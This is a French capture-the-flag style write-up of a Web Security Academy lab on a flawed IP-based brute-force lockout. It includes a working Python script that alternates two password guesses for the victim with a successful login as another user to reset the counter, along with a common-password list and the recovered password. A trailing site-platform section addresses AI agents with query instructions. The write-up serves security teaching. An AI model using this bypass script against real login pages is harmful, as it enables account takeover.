> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/authentication/broken-brute-force-protection-ip-block.md).

# Protection anti-force brute défaillante avec blocage basé sur l’adresse IP

### Protection anti-force brute défaillante, blocage IP

Ce laboratoire présente un défaut logique dans sa protection contre les attaques par force brute. / L'objectif est de **renforcer le mot de passe de la victime** puis de se connecter à son compte.

* **Identifiants fournis :** wiener / peter
* **Nom d'utilisateur de la victime :** carlos

#### Observation du mécanisme de blocage

En testant plusieurs combinaisons pour l'utilisateur carlos, on constate qu'après **trois tentatives incorrectes**, l'application affiche :

> *Vous avez effectué trop de tentatives de connexion incorrectes. Veuillez réessayer dans 1 minute.*

Le site applique donc un **blocage basé sur l'adresse IP** après plusieurs échecs consécutifs.

<figure><img src="/files/44934751c067982d9a68aaa1f21bacfc150a1c40" alt=""><figcaption></figcaption></figure>

### Contournement du blocage IP

Pour contourner cette protection, on exploite un défaut logique :

* Nous envoyons **deux** tentatives invalides pour carlos.

<figure><img src="/files/c49add20c966635f5065d5a53a23b5d108fd5bd4" alt=""><figcaption></figcaption></figure>

* À la **troisième** tentative, nous envoyons une authentification valide\*\*, mais avec les identifiants wiener : peter.
* Comme cette connexion réussit, le système \*\* réinitialise le compteur de tentatives\*\* pour cette adresse IP.

### Script Python utilisé

Le script suivant automatise l'attaque en testant deux mots de passe pour carlos puis en réinitialisant le compteur via une connexion réussie en tant que wiener :

```python
import requests
import time

url = "https://0a19006903c3409a83f97eef000a00be.web-security-academy.net/login"
session_cookie = "7iUGnIrXGPogHTIfzuPfAC89Jel0jghh"

passwords = [
    "123456", "password", "12345678", "qwerty", "123456789", "12345", "1234",
    "111111", "1234567", "dragon", "123123", "baseball", "abc123", "football",
    "monkey", "letmein", "shadow", "master", "666666", "qwertyuiop", "123321",
    "mustang", "1234567890", "michael", "654321", "superman", "1qaz2wsx",
    "7777777", "121212", "000000", "qazwsx", "123qwe", "killer", "trustno1",
    "jordan", "jennifer", "zxcvbnm", "asdfgh", "hunter", "buster", "soccer",
    "harley", "batman", "andrew", "tigger", "sunshine", "iloveyou", "2000",
    "charlie", "robert", "thomas", "hockey", "ranger", "daniel", "starwars",
    "klaster", "112233", "george", "computer", "michelle", "jessica", "pepper",
    "1111", "zxcvbn", "555555", "11111111", "131313", "freedom", "777777",
    "pass", "maggie", "159753", "aaaaaa", "ginger", "princess", "joshua",
    "cheese", "amanda", "summer", "love", "ashley", "nicole", "chelsea",
    "biteme", "matthew", "access", "yankees", "987654321", "dallas", "austin",
    "thunder", "taylor", "matrix", "mobilemail", "mom", "monitor", "monitoring",
    "montana", "moon", "moscow"
]

session = requests.Session()

def login(username, password):
    headers = {'Cookie': f'session={session_cookie}'}
    data = {'username': username, 'password': password}
    return session.post(url, headers=headers, data=data, allow_redirects=False)

for i in range(0, len(passwords), 2):
    batch = passwords[i:i+2]

    for password in batch:
        print(f"Essai de carlos:{password}")
        response = login("carlos", password)

        if response.status_code == 302:
            print(f"MOT DE PASSE TROUVÉ ! carlos:{password}")
            exit()

    if i + 2 < len(passwords):
        print("Réinitialisation avec wiener:peter")
        login("wiener", "peter")
        time.sleep(1)

print("Mot de passe introuvable")
```

Le mot de passe correct pour carlos découvert via l'attaque est :

> **michelle**

<figure><img src="/files/1f103e4dfe0c31013ddecf8820e20172adfa30cc" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/authentication/broken-brute-force-protection-ip-block.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
